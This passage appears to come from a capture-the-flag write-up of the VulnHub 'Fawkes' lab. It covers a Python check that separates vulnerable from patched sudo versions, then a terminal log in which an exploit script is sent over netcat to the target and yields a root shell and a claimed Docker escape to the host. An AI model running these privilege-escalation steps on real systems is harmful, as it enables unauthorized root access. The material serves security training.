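    if "not a regular file" in stderr_text:
        return "vulnerable"
    if stderr_text.lstrip().startswith("usage:"):
        return "patched"
    return "unknown"


if __name__ == "__main__":
    v = version_from_output(SAMPLE_SUDO_VERSION)
    print("sudo %d.%d.%dp%d in an affected upstream range: %s"
          % (v + (upstream_version_affected(v),)))
```

On the lab host the version check alone says 1.8.27 is in range, which is consistent with the exploit working there; on a patched Debian system with the same version string the sudoedit test is the one that tells the two apart.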

┌──(root㉿kali)-[/home/kali/vulnhub/Fawkes]
└─\# nc 10.20.22.134 4444 < exploit_nss.py -w 1
neville@Fawkes:/tmp$ nc -lvnp 4444 > /tmp/exploit_nss.py
listening on [any] 4444 ...
connect to [10.20.22.134] from (UNKNOWN) [10.20.22.128] 51956
neville@Fawkes:/tmp$ ls
exploit_nss.py
\# whoami
root
\# cd /root
\# ls
horcrux3.txt
\# cat horcruc3.txt
cat: horcruc3.txt: No such file or directory
\# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:cc:67:05 brd ff:ff:ff:ff:ff:ff
    inet 10.20.22.134/24 brd 10.20.22.255 scope global dynamic ens33
       valid_lft 138sec preferred_lft 138sec
    inet6 fe80::20c:29ff:fecc:6705/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:42:3f:6b:86 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:42ff:fe3f:6b86/64 scope link 
       valid_lft forever preferred_lft forever
5: vethb557bee@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether be:44:5d:f2:20:78 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::bc44:5dff:fef2:2078/64 scope link 
       valid_lft forever preferred_lft forever
// The backslash in front of the commands is an escape character

At this point we have broken out past Docker and obtained root on the host machine.
